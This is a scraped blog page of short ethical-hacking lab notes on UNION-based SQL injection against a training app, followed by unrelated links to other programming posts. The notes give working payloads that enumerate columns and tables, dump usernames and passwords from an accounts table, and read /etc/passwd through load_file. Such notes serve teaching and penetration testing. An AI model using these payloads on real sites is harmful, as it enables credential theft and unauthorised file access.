SQL INJECTION

Discovering SQLi in GET

Inject by browser URL.

Selecting Data From Database

Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column.

Using “union select 1,2,3,4,5” to find the right column.

Then replace it with the information we want to get. (database, user, version)

Finding Database Tables

union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'

Extracting Sensitive Data Such As Passwords.

union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'

union select 1,username,password,is_admin,5 from accounts

Reading Files

union select null,load_file('/etc/passwd'),null,null,null

Writing Files

Ethical Hacking - Web Penetration Testing(9)的更多相关文章

  1. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  2. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  3. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  4. Ethical Hacking - Web Penetration Testing(6)

    REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...

  5. Ethical Hacking - Web Penetration Testing(1)

    How to hack a website? An application installed on a computer. ->web application pen-testing A co ...

  6. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  7. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  8. Ethical Hacking - Web Penetration Testing(12)

    XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page ...

  9. Ethical Hacking - Web Penetration Testing(11)

    SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be byp ...

随机推荐

  1. WINCC 应用与提高(78讲15.98G)视频教程网盘下载

    收集与网络,供参考. https://blog.csdn.net/txwtech/article/details/94225748

  2. scanf中的%[^\n]%*c格式

    scanf中的%[^\n]%*c格式 (2011-02-19 16:12:38) 转载▼ 标签:  控制字符 空白字符 字符串 变量 整数 it 分类: C语言编程 文章转载自http://blog. ...

  3. jmeter使用小结(一)

    jmeter是用来做接口压力测试的工具.这里只是简单介绍一下使用,大家可以自行查看帮助文档, 1.打开jmeter工具,创建线程组任务 2.添加配置元件,根据需要选择设置 3.添加采样器,这里是htt ...

  4. Spring IoC 循环依赖的处理

    前言 本系列全部基于 Spring 5.2.2.BUILD-SNAPSHOT 版本.因为 Spring 整个体系太过于庞大,所以只会进行关键部分的源码解析. 本篇文章主要介绍 Spring IoC 是 ...

  5. MongoDB快速入门教程(3.1)

    3.MongoDB进阶 3.1.权限验证 以下内容适用于Mac系统用户,window系统用户请看后面文档 3.1.1.创建超级管理员用户 默认情况下连接mongodb是不需要用户名和密码的,这样不安全 ...

  6. js基础练习题(4)

    9.对象 阅读代码,回答问题 function User(name) { var name1 = name; this.name2 = name; function getName1() { retu ...

  7. 读取和写入blob类型数据

    读写oracle  blob类型 http://zyw090111.iteye.com/blog/607869 http://blog.csdn.net/jeryjeryjery/article/de ...

  8. 洛谷 P3243 【[HNOI2015]菜肴制作】

    先吐槽一下这个难度吧,评的有点高了,但是希望别降,毕竟这是我能做出来的不多的紫题了(狗头). 大家上来的第一反应应该都是啊,模板题,然后兴高采烈的打了拓补排序的板子,然后搞个小根堆,按照字典序输出就可 ...

  9. JavaScript常用API合集汇总(一)

    今天这篇文章跟大家分享一些JavaScript常用的API代码,有DOM操作.CSS操作.对象(Object对象.Array对象.Number对象.String对象.Math对象.JSON对象和Con ...

  10. Drools之基础语法

    一.规则文件 标准的规则文件以”.drl”结尾. 一套完整的规则文件内容如下: package:包名,只限于逻辑上的管理,若自定义的查询或函数位于同一包名,不管物理位置如何,都可以直接调用. impo ...